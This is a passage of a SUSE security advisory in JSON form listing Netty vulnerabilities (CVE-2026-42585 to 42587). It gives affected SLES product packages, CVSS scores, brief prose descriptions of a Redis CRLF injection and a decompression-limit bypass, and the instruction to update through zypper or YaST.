"url": "https://www.suse.com/security/cve/CVE-2026-42585"
},
{
"category": "external",
"summary": "SUSE Bug 1265291 for CVE-2026-42585",
"url": "https://bugzilla.suse.com/1265291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "moderate"
}
],
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42586",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42586"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the Netty Redis codec encoder (RedisEncoder) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (\\r\\n) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42586",
"url": "https://www.suse.com/security/cve/CVE-2026-42586"
},
{
"category": "external",
"summary": "SUSE Bug 1265245 for CVE-2026-42586",
"url": "https://bugzilla.suse.com/1265245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42586"
},
{
"cve": "CVE-2026-42587",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42587"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42587",
"url": "https://www.suse.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "SUSE Bug 1265246 for CVE-2026-42587",
"url": "https://bugzilla.suse.com/1265246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
